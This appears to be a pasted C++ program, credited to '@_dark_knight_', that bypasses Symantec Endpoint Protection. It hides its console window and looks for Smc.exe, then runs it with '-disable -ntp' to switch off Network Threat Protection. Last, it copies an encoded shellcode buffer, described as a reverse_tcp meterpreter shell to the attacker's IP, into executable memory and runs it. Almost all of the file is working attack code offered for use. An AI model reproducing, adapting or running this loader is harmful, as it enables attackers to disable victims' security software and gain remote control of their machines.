Untitled

/******************************************************************************************
*   Author: @_dark_knight_
*   Description: Bypassing Symantec Endpoint Protection.
*                           This creates a reverse_tcp meterpreter shell
*                           and stops Network Threat Protection to allow communication  out
*                           to our attacking IP.
*
*   Special Notes: Process enumeration code lifted from: http://msdn.microsoft.com/en-
*   us/library/windows/desktop/ms686701(v=vs.85).aspx
*
*********************************************************************************************/

/*- Include files -*/
#define _WIN32_WINNT 0x0500
#include <iostream>
#include <Windows.h>
#include <tlhelp32.h>
#include <tchar.h>
#include <iostream>
#include <WinBase.h>

//  Forward declarations:
BOOL KillSymantec( );

int main()
{
    /*- Pointer to shellcode memory segment -*/
    LPVOID lpvResult;

    /*- Hide console window -*/
    HWND hWnd = GetConsoleWindow();
    ShowWindow(hWnd, SW_HIDE);

    /*- Kill Symantec Endpoint Encryption if it is running -*/
    KillSymantec();

    /* [*] x86/alpha_mixed succeeded with size 641 (iteration=1) */
    char buf[] = "\x89\xe3\xdd\xc6\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49"
            "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
            "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
            "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
            "\x42\x75\x4a\x49\x59\x6c\x4d\x38\x6e\x69\x77\x70\x33\x30"
            "\x65\x50\x73\x50\x4e\x69\x58\x65\x50\x31\x6a\x72\x72\x44"
            "\x4c\x4b\x36\x32\x56\x50\x6e\x6b\x42\x72\x44\x4c\x4e\x6b"
            "\x61\x42\x55\x44\x6e\x6b\x44\x32\x71\x38\x34\x4f\x48\x37"
            "\x33\x7a\x35\x76\x50\x31\x4b\x4f\x34\x71\x6f\x30\x4c\x6c"
            "\x47\x4c\x45\x31\x51\x6c\x57\x72\x46\x4c\x77\x50\x4a\x61"
            "\x48\x4f\x74\x4d\x76\x61\x48\x47\x6d\x32\x48\x70\x30\x52"
            "\x72\x77\x4e\x6b\x31\x42\x72\x30\x6e\x6b\x30\x42\x75\x6c"
            "\x55\x51\x5a\x70\x6c\x4b\x63\x70\x64\x38\x4e\x65\x39\x50"
            "\x51\x64\x70\x4a\x45\x51\x6a\x70\x70\x50\x6c\x4b\x47\x38"
            "\x75\x48\x6e\x6b\x32\x78\x35\x70\x36\x61\x48\x53\x48\x63"
            "\x67\x4c\x70\x49\x4e\x6b\x46\x54\x6e\x6b\x56\x61\x4b\x66"
            "\x75\x61\x39\x6f\x35\x61\x79\x50\x4c\x6c\x6a\x61\x5a\x6f"
            "\x64\x4d\x46\x61\x6b\x77\x65\x68\x4b\x50\x51\x65\x4b\x44"
            "\x43\x33\x43\x4d\x58\x78\x47\x4b\x43\x4d\x35\x74\x61\x65"
            "\x4a\x42\x71\x48\x6c\x4b\x71\x48\x66\x44\x55\x51\x4b\x63"
            "\x53\x56\x4c\x4b\x44\x4c\x50\x4b\x6e\x6b\x31\x48\x57\x6c"
            "\x75\x51\x4b\x63\x4c\x4b\x46\x64\x4e\x6b\x77\x71\x58\x50"
            "\x4b\x39\x62\x64\x44\x64\x45\x74\x31\x4b\x71\x4b\x71\x71"
            "\x73\x69\x63\x6a\x70\x51\x79\x6f\x4b\x50\x32\x78\x51\x4f"
            "\x52\x7a\x6c\x4b\x54\x52\x5a\x4b\x6f\x76\x43\x6d\x32\x48"
            "\x57\x43\x50\x32\x63\x30\x77\x70\x52\x48\x34\x37\x44\x33"
            "\x65\x62\x53\x6f\x32\x74\x33\x58\x72\x6c\x44\x37\x74\x66"
            "\x66\x67\x59\x6f\x68\x55\x4e\x58\x6a\x30\x53\x31\x53\x30"
            "\x53\x30\x31\x39\x49\x54\x30\x54\x76\x30\x63\x58\x71\x39"
            "\x4b\x30\x52\x4b\x67\x70\x59\x6f\x6a\x75\x70\x50\x66\x30"
            "\x30\x50\x50\x50\x43\x70\x46\x30\x61\x50\x46\x30\x31\x78"
            "\x6a\x4a\x34\x4f\x39\x4f\x6d\x30\x69\x6f\x48\x55\x4d\x47"
            "\x53\x5a\x37\x75\x53\x58\x79\x50\x6e\x48\x63\x31\x45\x34"
            "\x75\x38\x34\x42\x55\x50\x66\x61\x6d\x6b\x6c\x49\x6a\x46"
            "\x63\x5a\x72\x30\x61\x46\x53\x67\x65\x38\x4f\x69\x59\x35"
            "\x30\x74\x70\x61\x59\x6f\x48\x55\x4b\x35\x69\x50\x31\x64"
            "\x36\x6c\x49\x6f\x70\x4e\x67\x78\x51\x65\x6a\x4c\x43\x58"
            "\x7a\x50\x4c\x75\x6f\x52\x72\x76\x49\x6f\x5a\x75\x53\x5a"
            "\x75\x50\x63\x5a\x66\x64\x62\x76\x50\x57\x31\x78\x36\x62"
            "\x48\x59\x48\x48\x53\x6f\x6b\x4f\x38\x55\x4e\x6b\x77\x46"
            "\x72\x4a\x61\x50\x65\x38\x65\x50\x32\x30\x57\x70\x63\x30"
            "\x46\x36\x50\x6a\x47\x70\x53\x58\x56\x38\x49\x34\x53\x63"
            "\x6b\x55\x39\x6f\x6a\x75\x4e\x73\x36\x33\x50\x6a\x73\x30"
            "\x76\x36\x33\x63\x31\x47\x42\x48\x45\x52\x69\x49\x69\x58"
            "\x33\x6f\x6b\x4f\x38\x55\x67\x71\x4f\x33\x65\x79\x4f\x36"
            "\x6b\x35\x49\x66\x43\x45\x7a\x4c\x4b\x73\x41\x41";

        /*- Allocate memory -*/
        lpvResult = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

        /*- Copy shellcode to allocated memory -*/
        if (lpvResult != NULL ){
              RtlMoveMemory(lpvResult, buf, sizeof buf);
              ((void(*)())lpvResult)();
        }

        /*- Cleanup -*/
        VirtualFree(lpvResult, 0, MEM_RELEASE);

}/*- End main -*/

/*- Enumerate process to confirm client is running Symantec Endpoint Protection.
* Most of this code lifted from MSDN.
-*/
BOOL KillSymantec( )
{
  HANDLE hProcessSnap;
  PROCESSENTRY32 pe32;

  // Take a snapshot of all processes in the system.
  hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
  if( hProcessSnap == INVALID_HANDLE_VALUE )
  {
    return( FALSE );
  }

  // Set the size of the structure before using it.
  pe32.dwSize = sizeof( PROCESSENTRY32 );

  // Retrieve information about the first process,
  // and exit if unsuccessful
  if( !Process32First( hProcessSnap, &pe32 ) )
  {
    CloseHandle( hProcessSnap );          // clean the snapshot object
    return( FALSE );
  }

  /* Now walk the snapshot of processes, and when we find our target process
   * disable the Network Threat Protection.
   */
  do
  {

      if (_tcscmp(pe32.szExeFile,_T("Smc.exe")) == 0) {

          /*- Disable Network Threat Protection -*/
          system("\"C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\Smc.exe\" -disable -ntp");

         /*- Wait 10 sec for things to settle -*/
         Sleep(10000);

         break;
       }

  } while( Process32Next( hProcessSnap, &pe32 ) );

  CloseHandle( hProcessSnap );
  return( TRUE );
}